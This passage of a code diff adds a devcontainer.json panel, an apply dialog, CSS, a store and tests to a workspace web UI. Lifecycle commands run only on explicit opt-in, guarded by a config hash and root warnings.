+    }));
+    const { container } = render(<DevcontainerPanel workdir="/home/dev/api" />);
+    // Not inside a <details> — a collapsed warning is a warning nobody reads.
+    const block = container.querySelector('.dc-unsupported-blocking');
+    expect(block).toBeTruthy();
+    expect(block?.closest('details')).toBeNull();
+    expect(screen.getByText('features')).toBeTruthy();
+    expect(screen.getByText(/install as root/)).toBeTruthy();
+    expect(screen.getByText(/postCreateCommand/)).toBeTruthy();
+  });
+
+  it('collapses non-blocking unsupported properties', () => {
+    seed(mk({
+      unsupported: [{
+        key: 'initializeCommand', severity: 'ignored', detail: '',
+        reason: 'Runs on the client.', remedy: '',
+      }],
+    }));
+    const { container } = render(<DevcontainerPanel workdir="/home/dev/api" />);
+    expect(container.querySelector('details')).toBeTruthy();
+    expect(container.querySelector('.dc-unsupported-blocking')).toBeNull();
+  });
+
+  it('reports an unreadable file instead of pretending it is absent', () => {
+    seed(mk({ error: 'invalid JSON at line 12, column 3' }));
+    render(<DevcontainerPanel workdir="/home/dev/api" />);
+    expect(screen.getByText(/invalid JSON at line 12/)).toBeTruthy();
+  });
+
+  it('hides the Apply button in a read-only workspace', () => {
+    serverMode.value = { readOnly: true, authed: true, authMode: 'basic', demoShowAll: false };
+    seed(mk());
+    render(<DevcontainerPanel workdir="/home/dev/api" />);
+    expect(screen.queryByRole('button', { name: /Apply/ })).toBeNull();
+    expect(screen.getByText(/Read-only workspace/)).toBeTruthy();
+  });
+
+  it('disables Apply while a run is in progress', () => {
+    seed(mk({ busy: true }));
+    render(<DevcontainerPanel workdir="/home/dev/api" />);
+    const btn = screen.getByRole('button', { name: /Running/ }) as HTMLButtonElement;
+    expect(btn.disabled).toBe(true);
+  });
+});
+
+describe('DevcontainerApplyDialog', () => {
+  const withPostCreate = () => mk({
+    lifecycle: {
+      ...emptyLifecycle(),
+      postCreate: [{
+        name: '', kind: 'shell',
+        command: 'sudo apt-get install -y libpq-dev && npm ci',
+        display: 'sudo apt-get install -y libpq-dev && npm ci',
+        needs_root: true, root_reasons: ['`sudo` requires root'], caveats: [],
+      }],
+    },
+    needs_root: true,
+  });
+
+  it('renders the command text verbatim', () => {
+    seed(withPostCreate());
+    openApplyDialog('/home/dev/api');
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    expect(screen.getByText('sudo apt-get install -y libpq-dev && npm ci')).toBeTruthy();
+  });
+
+  it('renders the needs-root warning inline with the command', () => {
+    seed(withPostCreate());
+    openApplyDialog('/home/dev/api');
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    expect(screen.getByText(/needs root/)).toBeTruthy();
+    expect(screen.getByText(/UID 1000 with no privilege escalation/)).toBeTruthy();
+  });
+
+  it('repeats blocking properties above the command list', () => {
+    seed(mk({
+      ...withPostCreate(),
+      unsupported: [{
+        key: 'features', severity: 'blocking', detail: '',
+        reason: 'features install as root at image-build time.', remedy: '',
+      }],
+    }));
+    openApplyDialog('/home/dev/api');
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    // Modal renders through a Portal, so the dialog is in document.body, not
+    // in the render container.
+    const blockingEl = document.querySelector('.dc-unsupported-blocking');
+    const cmdEl = document.querySelector('.dc-cmd');
+    expect(blockingEl).toBeTruthy();
+    expect(cmdEl).toBeTruthy();
+    expect(blockingEl!.compareDocumentPosition(cmdEl!) & Node.DOCUMENT_POSITION_FOLLOWING)
+      .toBeTruthy();
+  });
+
+  it('defaults every hook to OFF, so the safe action is one click', () => {
+    seed(withPostCreate());
+    openApplyDialog('/home/dev/api');
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    const box = document.querySelector('input[type=checkbox]') as HTMLInputElement;
+    expect(box.checked).toBe(false);
+    expect(screen.getByText('Apply without running commands')).toBeTruthy();
+  });
+
+  it('sends the hash it was loaded with once a hook is ticked', async () => {
+    seed(withPostCreate());
+    openApplyDialog('/home/dev/api');
+    const posts: unknown[] = [];
+    globalThis.fetch = vi.fn(async (_u: string, init?: RequestInit) => {
+      if ((init?.method ?? 'GET') === 'POST') {
+        posts.push(JSON.parse(init!.body as string));
+        return {
+          ok: true, status: 202, statusText: '',
+          headers: { get: () => 'application/json' },
+          json: async () => ({
+            ports_pinned: [], port_conflicts: [], settings_written: [],
+            settings_skipped: [], extensions_installed: [], extension_failures: [],
+            env: [], hooks_started: ['postCreate'], unsupported: [],
+          }),
+          text: async () => '{}',
+        } as unknown as Response;
+      }
+      return {
+        ok: true, status: 200, statusText: '',
+        headers: { get: () => 'application/json' },
+        json: async () => devcontainers.value['/home/dev/api'],
+        text: async () => '{}',
+      } as unknown as Response;
+    }) as unknown as typeof fetch;
+
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    fireEvent.click(document.querySelector('input[type=checkbox]')!);
+    fireEvent.click(screen.getByText(/Apply and run 1 hook/));
+    await waitFor(() => expect(posts).toHaveLength(1));
+    expect((posts[0] as { config_hash: string }).config_hash).toBe('hash-1');
+    expect((posts[0] as { hooks: string[] }).hooks).toEqual(['postCreate']);
+  });
+
+  it('offers the boot opt-in only once postStart is selected', () => {
+    seed(mk({
+      lifecycle: {
+        ...emptyLifecycle(),
+        postStart: [{ name: '', kind: 'shell', command: 'npm start', display: 'npm start', needs_root: false, root_reasons: [], caveats: [] }],
+      },
+    }));
+    openApplyDialog('/home/dev/api');
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    expect(document.querySelector('.dc-auto')).toBeNull();
+    fireEvent.click(document.querySelector('input[type=checkbox]')!);
+    expect(document.querySelector('.dc-auto')).toBeTruthy();
+  });
+
+  it('renders nothing for an unreadable file', () => {
+    seed(mk({ error: 'broken' }));
+    openApplyDialog('/home/dev/api');
+    render(<DevcontainerApplyDialog workdir="/home/dev/api" />);
+    expect(document.querySelector('.dc-dialog-title')).toBeNull();
+  });
+});

--- a/charts/workspace/web/src/routes/cto/DevcontainerPanel.tsx
+++ b/charts/workspace/web/src/routes/cto/DevcontainerPanel.tsx
@@ -1,0 +1,176 @@
+import { useEffect } from 'preact/hooks';
+import { Icon } from '../../components/Icon';
+import { MutatorOnly } from '../../components/MutatorOnly';
+import { serverMode } from '../../store/server-mode';
+import {
+  devcontainerFor,
+  loadDevcontainer,
+  openApplyDialog,
+  applyDialogWorkdir,
+} from '../../store/devcontainer';
+import { HOOKS, type HookName, type LifecycleEntry } from '../../api/devcontainer';
+import { DevcontainerApplyDialog } from './DevcontainerApplyDialog';
+
+/**
+ * The Dev container card in the project brief (#594).
+ *
+ * Renders under Git, in the same shape as the Git section. Three jobs:
+ *   1. Say what the repo declares (name, ports, extensions, hooks).
+ *   2. Say what has actually been done, per hook.
+ *   3. Say — prominently — what CANNOT be done here and why. That third one is
+ *      the whole point: a `features` block that is silently ignored produces a
+ *      workspace that looks configured and isn't.
+ *
+ * Renders nothing when the workdir has no devcontainer.json, so a project
+ * without one is unchanged.
+ */
+
+const STATUS_LABEL: Record<string, string> = {
+  pending: 'not run',
+  running: 'running',
+  done: 'ran',
+  stale: 'changed — re-run',
+  failed: 'failed',
+  timed_out: 'timed out',
+};
+
+function relTime(epochSeconds?: number | null): string {
+  if (!epochSeconds) return '';
+  const secs = Math.max(0, Math.floor(Date.now() / 1000 - epochSeconds));
+  if (secs < 60) return 'just now';
+  if (secs < 3600) return `${Math.floor(secs / 60)}m ago`;
+  if (secs < 86400) return `${Math.floor(secs / 3600)}h ago`;
+  return `${Math.floor(secs / 86400)}d ago`;
+}
+
+function HookRow({ hook, entry }: { hook: HookName; entry: LifecycleEntry }) {
+  const when = relTime(entry.ran_at);
+  const failed = entry.status === 'failed' || entry.status === 'timed_out';
+  return (
+    <li class="cto-brief-item dc-hook">
+      <span class={`dc-pill dc-pill-${entry.status}`}>
+        {STATUS_LABEL[entry.status] ?? entry.status}
+      </span>
+      <code class="dc-hook-name">{hook}</code>
+      {when && <span class="cto-brief-date">{when}</span>}
+      {failed && typeof entry.exit_code === 'number' && entry.exit_code >= 0 && (
+        <span class="dc-exit">exit {entry.exit_code}</span>
+      )}
+    </li>
+  );
+}
+
+export function DevcontainerPanel({ workdir }: { workdir: string }) {
+  useEffect(() => {
+    if (workdir) void loadDevcontainer(workdir);
+  }, [workdir]);
+
+  const rec = devcontainerFor(workdir);
+  // No file here, or the feature is off — render nothing rather than an empty
+  // card. Most projects have no devcontainer and should look untouched.
+  if (!rec || !rec.found) return null;
+
+  if (rec.error) {
+    return (
+      <section class="cto-brief-section">
+        <h3 class="cto-brief-h">Dev container</h3>
+        <p class="dc-error">
+          <code>{rec.rel_path}</code> could not be read: {rec.error}
+        </p>
+      </section>
+    );
+  }
+
+  const blocking = rec.unsupported.filter((u) => u.severity === 'blocking');
+  const other = rec.unsupported.filter((u) => u.severity !== 'blocking');
+  const facts: string[] = [];
+  if (rec.ports.length) facts.push(`${rec.ports.length} ports`);
+  if (rec.extensions.length) facts.push(`${rec.extensions.length} extensions`);
+  const settingsCount = Object.keys(rec.settings).length;
+  if (settingsCount) facts.push(`${settingsCount} settings`);
+  const envCount = Object.keys(rec.env).length;
+  if (envCount) facts.push(`${envCount} env`);
+
+  const hookRows = HOOKS
+    .map((h) => [h, rec.lifecycle_status[h]] as const)
+    .filter(([, e]) => e && e.status !== 'none');
+
+  return (
+    <section class="cto-brief-section dc-section">
+      <h3 class="cto-brief-h">Dev container</h3>
+
+      <p class="dc-head">
+        <Icon name="mission" size={12} />
+        <span class="dc-name">{rec.name || rec.rel_path}</span>
+        {facts.length > 0 && <span class="dc-facts">{facts.join(' · ')}</span>}
+      </p>
+      <p class="dc-path"><code>{rec.rel_path}</code></p>
+
+      {hookRows.length > 0 && (
+        <ul class="cto-brief-list dc-hooks">
+          {hookRows.map(([hook, entry]) => (
+            <HookRow key={hook} hook={hook} entry={entry as LifecycleEntry} />
+          ))}
+        </ul>
+      )}
+
+      {blocking.length > 0 && (
+        // Expanded, not collapsed. Someone who never opens this block would
+        // otherwise believe their `features` were installed.
+        <div class="dc-unsupported dc-unsupported-blocking">
+          <p class="dc-unsupported-head">
+            ⚠ {blocking.length} {blocking.length === 1 ? 'property' : 'properties'}{' '}
+            can&apos;t be applied here
+          </p>
+          <ul class="dc-unsupported-list">
+            {blocking.map((u) => (
+              <li key={u.key}>
+                <code>{u.key}</code>
+                <span class="dc-reason">{u.reason}</span>
+                {u.remedy && <span class="dc-remedy">{u.remedy}</span>}
+              </li>
+            ))}
+          </ul>
+        </div>
+      )}
+
+      {other.length > 0 && (
+        <details class="dc-unsupported">
+          <summary>{other.length} more not applied here</summary>
+          <ul class="dc-unsupported-list">
+            {other.map((u) => (
+              <li key={u.key}>
+                <code>{u.key}</code>
+                <span class="dc-reason">{u.reason}</span>
+              </li>
+            ))}
+          </ul>
+        </details>
+      )}
+
+      {rec.caveats.length > 0 && (
+        <ul class="dc-caveats">
+          {rec.caveats.map((c) => <li key={c}>{c}</li>)}
+        </ul>
+      )}
+
+      <MutatorOnly>
+        <button
+          type="button"
+          class="dc-apply-btn"
+          disabled={rec.busy}
+          onClick={() => openApplyDialog(workdir)}
+        >
+          {rec.busy ? 'Running…' : 'Apply…'}
+        </button>
+      </MutatorOnly>
+      {serverMode.value.readOnly && (
+        <p class="dc-readonly">Read-only workspace — nothing can be applied.</p>
+      )}
+
+      {applyDialogWorkdir.value === workdir && (
+        <DevcontainerApplyDialog workdir={workdir} />
+      )}
+    </section>
+  );
+}

--- a/charts/workspace/web/src/routes/cto/cto.css
+++ b/charts/workspace/web/src/routes/cto/cto.css
@@ -653,3 +653,115 @@
     min-height: 44px;
   }
 }
+
+/* ── Dev container card (#594) ──────────────────────────────────────────────
+   Lives in the brief rail under Git. The unsupported block is deliberately
+   loud: a `features:` entry that renders as quiet grey text is a workspace
+   that looks configured and isn't. */
+.dc-section { gap: 8px; }
+.dc-head {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  font-size: var(--text-md);
+  color: var(--text);
+}
+.dc-name { font-weight: var(--weight-semibold); }
+.dc-facts { color: var(--text-muted); font-size: var(--text-xs); }
+.dc-path {
+  font-family: var(--font-mono);
+  font-size: var(--text-xs);
+  color: var(--text-subtle);
+  overflow: hidden;
+  text-overflow: ellipsis;
+  white-space: nowrap;
+}
+.dc-hooks { gap: 4px; }
+.dc-hook { display: flex; align-items: center; gap: 6px; flex-wrap: wrap; }
+.dc-hook-name { font-family: var(--font-mono); font-size: var(--text-xs); color: var(--text); }
+.dc-exit { font-size: var(--text-xs); color: var(--danger); font-family: var(--font-mono); }
+.dc-pill {
+  font-size: var(--text-xs);
+  padding: 1px 6px;
+  border-radius: 999px;
+  background: var(--surface-2);
+  color: var(--text-muted);
+  white-space: nowrap;
+}
+.dc-pill-done { color: var(--ok, #3fb950); }
+.dc-pill-running { color: var(--accent); }
+.dc-pill-stale,
+.dc-pill-pending { color: var(--warn); }
+.dc-pill-failed,
+.dc-pill-timed_out { color: var(--danger); }
+
+.dc-unsupported {
+  font-size: var(--text-xs);
+  color: var(--text-muted);
+  border-radius: var(--radius-sm, 6px);
+}
+.dc-unsupported-blocking {
+  border-left: 2px solid var(--warn);
+  padding: 6px 0 6px 8px;
+  background: var(--surface-2);
+}
+.dc-unsupported-head { color: var(--warn); font-weight: var(--weight-semibold); }
+.dc-unsupported-list { list-style: none; display: flex; flex-direction: column; gap: 6px; margin-top: 4px; }
+.dc-unsupported-list li { display: flex; flex-direction: column; gap: 2px; }
+.dc-unsupported-list code { font-family: var(--font-mono); color: var(--text); }
+.dc-reason { line-height: 1.4; }
+.dc-remedy { color: var(--text-subtle); line-height: 1.4; }
+.dc-caveats {
+  list-style: none;
+  font-size: var(--text-xs);
+  color: var(--text-subtle);
+  display: flex;
+  flex-direction: column;
+  gap: 3px;
+}
+.dc-error { font-size: var(--text-xs); color: var(--danger); line-height: 1.4; }
+.dc-readonly { font-size: var(--text-xs); color: var(--text-subtle); }
+.dc-apply-btn {
+  align-self: flex-start;
+  font-size: var(--text-xs);
+  padding: 4px 10px;
+  border-radius: var(--radius-sm, 6px);
+  border: 1px solid var(--border);
+  background: var(--surface-2);
+  color: var(--text);
+  cursor: pointer;
+}
+.dc-apply-btn:hover:not(:disabled) { background: var(--surface-3, var(--surface-2)); }
+.dc-apply-btn:disabled { opacity: 0.6; cursor: default; }
+
+/* ── Apply dialog ─────────────────────────────────────────────────────────
+   The command text is rendered verbatim and must stay readable — it is what
+   the user is actually consenting to, so it wraps rather than truncating. */
+.dc-dialog-title { font-size: var(--text-lg); color: var(--text); }
+.dc-dialog-sub { font-family: var(--font-mono); font-size: var(--text-xs); color: var(--text-subtle); margin-bottom: 10px; }
+.dc-dialog-block { margin-top: 12px; display: flex; flex-direction: column; gap: 6px; }
+.dc-dialog-h { font-size: var(--text-md); font-weight: var(--weight-semibold); color: var(--text); }
+.dc-dialog-list { list-style: none; font-size: var(--text-xs); color: var(--text-muted); display: flex; flex-direction: column; gap: 3px; }
+.dc-dialog-warn { font-size: var(--text-xs); color: var(--warn); line-height: 1.45; }
+.dc-hook-block { border-top: 1px solid var(--border); padding-top: 8px; display: flex; flex-direction: column; gap: 6px; }
+.dc-hook-label { display: flex; align-items: center; gap: 6px; font-size: var(--text-md); color: var(--text); cursor: pointer; }
+.dc-hook-label code { font-family: var(--font-mono); }
+.dc-hook-count { font-size: var(--text-xs); color: var(--text-subtle); }
+.dc-auto { border-top: 1px solid var(--border); padding-top: 8px; }
+.dc-cmd { display: flex; flex-direction: column; gap: 3px; }
+.dc-cmd-name { font-size: var(--text-xs); color: var(--text-subtle); font-family: var(--font-mono); }
+.dc-cmd-text {
+  font-family: var(--font-mono);
+  font-size: var(--text-xs);
+  color: var(--text);
+  background: var(--surface-2);
+  padding: 6px 8px;
+  border-radius: var(--radius-sm, 6px);
+  white-space: pre-wrap;
+  word-break: break-word;
+  max-height: 180px;
+  overflow-y: auto;
+}
+.dc-cmd-root { font-size: var(--text-xs); color: var(--warn); line-height: 1.4; }
+.dc-cmd-caveat { font-size: var(--text-xs); color: var(--text-subtle); line-height: 1.4; }
+.dc-dialog-actions { display: flex; justify-content: flex-end; gap: 8px; margin-top: 16px; }

--- a/charts/workspace/web/src/store/devcontainer.test.ts
+++ b/charts/workspace/web/src/store/devcontainer.test.ts
@@ -1,0 +1,190 @@
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
+import {
+  devcontainers,
+  devcontainerFor,
+  devcontainerError,
+  loadDevcontainer,
+  applyDevcontainerTo,
+  resetDevcontainerAt,
+  openApplyDialog,
+  closeApplyDialog,
+  applyDialogWorkdir,
+  _resetDevcontainerForTest,
+} from './devcontainer';
+
+const realFetch = globalThis.fetch;
+
+beforeEach(() => {
+  _resetDevcontainerForTest();
+});
+
+afterEach(() => {
+  globalThis.fetch = realFetch;
+  vi.restoreAllMocks();
+  _resetDevcontainerForTest();
+});
+
+function routeFetch(
+  routes: Array<[(url: string, method: string) => boolean, () => { status: number; body: unknown }]>,
+) {
+  const calls: { url: string; method: string; body?: unknown }[] = [];
+  globalThis.fetch = vi.fn(async (u: string, init?: RequestInit) => {
+    const method = init?.method ?? 'GET';
+    calls.push({ url: u, method, body: init?.body ? JSON.parse(init.body as string) : undefined });
+    for (const [test, respond] of routes) {
+      if (test(u, method)) {
+        const { status, body } = respond();
+        return {
+          ok: status >= 200 && status < 300,
+          status,
+          statusText: '',
+          headers: {
+            get: (k: string) => (k.toLowerCase() === 'content-type' ? 'application/json' : null),
+          },
+          json: async () => body,
+          text: async () => JSON.stringify(body),
+        } as unknown as Response;
+      }
+    }
+    throw new Error(`unrouted ${method} ${u}`);
+  }) as unknown as typeof fetch;
+  return calls;
+}
+
+const record = (workdir: string, over: Record<string, unknown> = {}) => ({
+  workdir, found: true, rel_path: '.devcontainer/devcontainer.json',
+  error: '', config_hash: 'hash-1', name: 'API',
+  lifecycle: { postCreate: [{ display: 'npm ci', kind: 'shell', needs_root: false }] },
+  ports: [{ port: 3000, label: 'API' }],
+  ...over,
+});
+
+describe('loadDevcontainer', () => {
+  it('populates the store keyed by workdir', async () => {
+    routeFetch([[(u) => u.includes('/api/devcontainer?'), () => ({ status: 200, body: record('/home/dev/api') })]]);
+    await loadDevcontainer('/home/dev/api');
+    expect(devcontainerFor('/home/dev/api')?.name).toBe('API');
+    expect(devcontainerFor('/home/dev/other')).toBeNull();
+  });
+
+  it('keeps the previous record when a refresh fails', async () => {
+    routeFetch([[() => true, () => ({ status: 200, body: record('/home/dev/api') })]]);
+    await loadDevcontainer('/home/dev/api');
+    routeFetch([[() => true, () => ({ status: 500, body: { error: 'boom' } })]]);
+    await loadDevcontainer('/home/dev/api');
+    expect(devcontainerFor('/home/dev/api')?.name).toBe('API');
+    expect(devcontainerError.value).toBeTruthy();
+  });
+
+  it('dedupes concurrent loads of the same workdir', async () => {
+    const calls = routeFetch([[() => true, () => ({ status: 200, body: record('/home/dev/api') })]]);
+    await Promise.all([
+      loadDevcontainer('/home/dev/api'),
+      loadDevcontainer('/home/dev/api'),
+      loadDevcontainer('/home/dev/api'),
+    ]);
+    expect(calls.filter((c) => c.method === 'GET')).toHaveLength(1);
+  });
+
+  it('ignores an empty workdir', async () => {
+    const calls = routeFetch([[() => true, () => ({ status: 200, body: {} })]]);
+    await loadDevcontainer('');
+    expect(calls).toHaveLength(0);
+  });
+});
+
+describe('applyDevcontainerTo', () => {
+  it('sends the loaded config hash with the selected hooks', async () => {
+    const calls = routeFetch([
+      [(u, m) => u.includes('/apply') && m === 'POST',
+        () => ({ status: 202, body: { ports_pinned: [3000], port_conflicts: [], settings_written: [], settings_skipped: [], extensions_installed: [], extension_failures: [], env: [], hooks_started: ['postCreate'], unsupported: [] } })],
+      [(u) => u.includes('/api/devcontainer?'), () => ({ status: 200, body: record('/home/dev/api') })],
+    ]);
+    const out = await applyDevcontainerTo('/home/dev/api', ['postCreate'], 'hash-1');
+    expect(out.ok).toBe(true);
+    const post = calls.find((c) => c.method === 'POST');
+    expect((post?.body as { config_hash: string }).config_hash).toBe('hash-1');
+  });
+
+  it('omits the hash when nothing will be executed', async () => {
+    const calls = routeFetch([
+      [(u, m) => u.includes('/apply') && m === 'POST',
+        () => ({ status: 202, body: { ports_pinned: [], port_conflicts: [], settings_written: [], settings_skipped: [], extensions_installed: [], extension_failures: [], env: [], hooks_started: [], unsupported: [] } })],
+      [(u) => u.includes('/api/devcontainer?'), () => ({ status: 200, body: record('/home/dev/api') })],
+    ]);
+    await applyDevcontainerTo('/home/dev/api', [], 'hash-1');
+    const post = calls.find((c) => c.method === 'POST');
+    expect((post?.body as { config_hash?: string }).config_hash).toBeUndefined();
+  });
+
+  it('reloads the record on a stale-hash conflict so the dialog re-prompts', async () => {
+    let applied = 0;
+    routeFetch([
+      [(u, m) => u.includes('/apply') && m === 'POST', () => {
+        applied += 1;
+        return { status: 409, body: { code: 'hash_mismatch', error: 'changed' } };
+      }],
+      [(u) => u.includes('/api/devcontainer?'),
+        () => ({ status: 200, body: record('/home/dev/api', { config_hash: 'hash-2' }) })],
+    ]);
+    const out = await applyDevcontainerTo('/home/dev/api', ['postCreate'], 'hash-1');
+    expect(out).toEqual({ ok: false, conflict: 'hash_mismatch' });
+    expect(applied).toBe(1);
+    expect(devcontainerFor('/home/dev/api')?.config_hash).toBe('hash-2');
+  });
+
+  it('reports a busy conflict without losing state', async () => {
+    routeFetch([
+      [(u, m) => u.includes('/apply') && m === 'POST',
+        () => ({ status: 409, body: { code: 'busy', error: 'running' } })],
+      [(u) => u.includes('/api/devcontainer?'), () => ({ status: 200, body: record('/home/dev/api') })],
+    ]);
+    const out = await applyDevcontainerTo('/home/dev/api', ['postCreate'], 'hash-1');
+    expect(out).toEqual({ ok: false, conflict: 'busy' });
+  });
+
+  it('returns an error outcome for anything else', async () => {
+    routeFetch([
+      [(u, m) => u.includes('/apply') && m === 'POST',
+        () => ({ status: 422, body: { error: 'invalid JSON' } })],
+    ]);
+    const out = await applyDevcontainerTo('/home/dev/api', [], 'hash-1');
+    expect(out.ok).toBe(false);
+    expect((out as { error: string }).error).toBeTruthy();
+  });
+});
+
+describe('resetDevcontainerAt', () => {
+  it('posts and reloads', async () => {
+    const calls = routeFetch([
+      [(u, m) => u.includes('/reset') && m === 'POST',
+        () => ({ status: 200, body: { cleared: true, unpinned: [3000] } })],
+      [(u) => u.includes('/api/devcontainer?'), () => ({ status: 200, body: record('/home/dev/api') })],
+    ]);
+    expect(await resetDevcontainerAt('/home/dev/api', true)).toBe(true);
+    expect(calls.some((c) => c.method === 'GET')).toBe(true);
+  });
+});
+
+describe('apply dialog state', () => {
+  it('opens and closes for one workdir at a time', () => {
+    expect(applyDialogWorkdir.value).toBeNull();
+    openApplyDialog('/home/dev/api');
+    expect(applyDialogWorkdir.value).toBe('/home/dev/api');
+    openApplyDialog('/home/dev/web');
+    expect(applyDialogWorkdir.value).toBe('/home/dev/web');
+    closeApplyDialog();
+    expect(applyDialogWorkdir.value).toBeNull();
+  });
+});
+
+describe('_resetDevcontainerForTest', () => {
+  it('clears everything', async () => {
+    routeFetch([[() => true, () => ({ status: 200, body: record('/home/dev/api') })]]);
+    await loadDevcontainer('/home/dev/api');
+    openApplyDialog('/home/dev/api');
+    _resetDevcontainerForTest();
+    expect(devcontainers.value).toEqual({});
+    expect(applyDialogWorkdir.value).toBeNull();
+  });
+});

--- a/charts/workspace/web/src/store/devcontainer.ts
+++ b/charts/workspace/web/src/store/devcontainer.ts
@@ -1,0 +1,175 @@
+import { signal } from '@preact/signals';
+import { subscribeEvents, type DashboardEvent } from '../api/events';
+import {
+  getDevcontainer,
+  applyDevcontainer,
+  resetDevcontainer,
+  DevcontainerConflictError,
+  type DevcontainerRecord,
+  type HookName,
+  type ApplyResult,
+} from '../api/devcontainer';
+import { pushToast } from './ui';
+
+/**
+ * devcontainer store (#594) — mirrors store/skills.ts: signals, in-flight
+ * dedupe, and an SSE subscription instead of polling.
+ *
+ * Keyed by WORKDIR, not project id: a project has N workdirs and a git
+ * worktree carries its own devcontainer.json, so a per-project cache would
+ * show the wrong file the moment someone opens a worktree.
+ */
+
+export const devcontainers = signal<Record<string, DevcontainerRecord>>({});
+export const devcontainerLoading = signal(false);
+export const devcontainerError = signal<string | null>(null);
+export const applyingDevcontainer = signal(false);
+
+/** The workdir whose apply dialog is open, or null. */
+export const applyDialogWorkdir = signal<string | null>(null);
+
+export function devcontainerFor(workdir: string): DevcontainerRecord | null {
+  return devcontainers.value[workdir] ?? null;
+}
+
+// Dedupe per workdir so an SSE-triggered reload and a mount-time load can't
+// race and clobber each other with the slower response.
+const inFlight = new Map<string, Promise<void>>();
+
+export async function loadDevcontainer(workdir: string, quiet = false): Promise<void> {
+  if (!workdir) return;
+  const existing = inFlight.get(workdir);
+  if (existing) return existing;
+  if (!quiet) devcontainerLoading.value = true;
+  const p = (async () => {
+    try {
+      const rec = await getDevcontainer(workdir);
+      devcontainers.value = { ...devcontainers.value, [workdir]: rec };
+      devcontainerError.value = null;
+    } catch (err) {
+      // Keep whatever we last rendered — a transient failure should not blank
+      // the panel and make the user think the file vanished.
+      devcontainerError.value = err instanceof Error ? err.message : String(err);
+    } finally {
+      if (!quiet) devcontainerLoading.value = false;
+      inFlight.delete(workdir);
+    }
+  })();
+  inFlight.set(workdir, p);
+  return p;
+}
+
+export function openApplyDialog(workdir: string) {
+  applyDialogWorkdir.value = workdir;
+}
+
+export function closeApplyDialog() {
+  applyDialogWorkdir.value = null;
+}
+
+export type ApplyOutcome =
+  | { ok: true; result: ApplyResult }
+  | { ok: false; conflict: string }
+  | { ok: false; error: string };
+
+/**
+ * Apply a devcontainer.json. `configHash` MUST be the hash that came back with
+ * the record the user was shown — the server refuses a mismatch with 409, and
+ * that refusal is the whole consent guarantee.
+ */
+export async function applyDevcontainerTo(
+  workdir: string,
+  hooks: HookName[],
+  configHash: string,
+  autoApply?: boolean,
+): Promise<ApplyOutcome> {
+  applyingDevcontainer.value = true;
+  try {
+    const result = await applyDevcontainer({
+      workdir,
+      hooks,
+      config_hash: hooks.length ? configHash : undefined,
+      auto_apply: autoApply,
+    });
+    const bits: string[] = [];
+    if (result.ports_pinned.length) bits.push(`${result.ports_pinned.length} ports`);
+    if (result.extensions_installed.length) {
+      bits.push(`${result.extensions_installed.length} extensions`);
+    }
+    if (result.settings_written.length) bits.push(`${result.settings_written.length} settings`);
+    if (result.hooks_started.length) bits.push(`${result.hooks_started.join(', ')} running`);
+    pushToast(bits.length ? `Applied — ${bits.join(', ')}` : 'Nothing to apply',
+      { kind: 'success' });
+    if (result.port_conflicts.length) {
+      pushToast(
+        `${result.port_conflicts.length} port(s) already pinned under another name — left alone`,
+        { kind: 'warn' },
+      );
+    }
+    await loadDevcontainer(workdir, true);
+    return { ok: true, result };
+  } catch (err) {
+    if (err instanceof DevcontainerConflictError) {
+      // Re-load so the dialog can show what the file says NOW rather than
+      // letting the user retry against text that is already stale.
+      await loadDevcontainer(workdir, true);
+      const msg = err.code === 'busy'
+        ? 'A devcontainer run is already in progress here.'
+        : 'devcontainer.json changed — review the new commands and confirm again.';
+      pushToast(msg, { kind: 'warn' });
+      return { ok: false, conflict: err.code };
+    }
+    const msg = err instanceof Error ? err.message : 'Apply failed';
+    pushToast(msg, { kind: 'danger' });
+    return { ok: false, error: msg };
+  } finally {
+    applyingDevcontainer.value = false;
+  }
+}
+
+export async function resetDevcontainerAt(workdir: string, unpinPorts = false): Promise<boolean> {
+  try {
+    await resetDevcontainer(workdir, unpinPorts);
+    pushToast('Devcontainer state cleared', { kind: 'success' });
+    await loadDevcontainer(workdir, true);
+    return true;
+  } catch (err) {
+    pushToast(err instanceof Error ? err.message : 'Reset failed', { kind: 'danger' });
+    return false;
+  }
+}
+
+// Real-time: the backend publishes `devcontainer.changed` when an apply lands
+// or a hook changes state, so a ten-minute postCreate reports progress without
+// the panel polling for it.
+let eventUnsub: (() => void) | null = null;
+
+function onDevcontainerEvent(ev: DashboardEvent) {
+  if (ev.type !== 'devcontainer.changed') return;
+  const workdir = (ev.data as { workdir?: string } | undefined)?.workdir;
+  // Reload ONLY the affected workdir — a burst of hook events must not refetch
+  // every devcontainer the user has ever opened.
+  if (workdir && devcontainers.value[workdir]) void loadDevcontainer(workdir, true);
+}
+
+export function startDevcontainerEvents() {
+  if (!eventUnsub) eventUnsub = subscribeEvents(onDevcontainerEvent);
+}
+
+export function stopDevcontainerEvents() {
+  if (eventUnsub) {
+    eventUnsub();
+    eventUnsub = null;
+  }
+}
+
+/** Test-only reset so suites don't leak state into each other. */
+export function _resetDevcontainerForTest() {
+  devcontainers.value = {};
+  devcontainerLoading.value = false;
+  devcontainerError.value = null;
+  applyingDevcontainer.value = false;
+  applyDialogWorkdir.value = null;
+  inFlight.clear();
+  stopDevcontainerEvents();
+}

--- a/docs/_manifest.json
+++ b/docs/_manifest.json
@@ -46,7 +46,8 @@
       "title": "Workspace",
       "pages": [
         { "id": "files", "title": "Files", "file": "in-app/files.md", "summary": "Files tab tour, upload limits, where data lives, the persistence model." },
-        { "id": "browser", "title": "Browser & VNC", "file": "in-app/browser.md", "summary": "Headless Firefox/Chrome on the virtual display, the VNC viewer, kiosk mode." }
+        { "id": "browser", "title": "Browser & VNC", "file": "in-app/browser.md", "summary": "Headless Firefox/Chrome on the virtual display, the VNC viewer, kiosk mode." },
+        { "id": "devcontainer", "title": "devcontainer.json", "file": "devcontainer.md", "summary": "Read the environment file your repo already carries — ports, extensions, settings, env and lifecycle commands applied inside the workspace pod, plus an honest account of what features/image/build cannot do here and why." }
       ]
     },
     {

--- a/docs/devcontainer.md
+++ b/docs/devcontainer.md
@@ -1,0 +1,168 @@
+# devcontainer.json
+
+If your repo already carries a `.devcontainer/devcontainer.json` — because it
+came from Codespaces, Coder, Ona or DevPod — kube-coder reads it. Forwarded
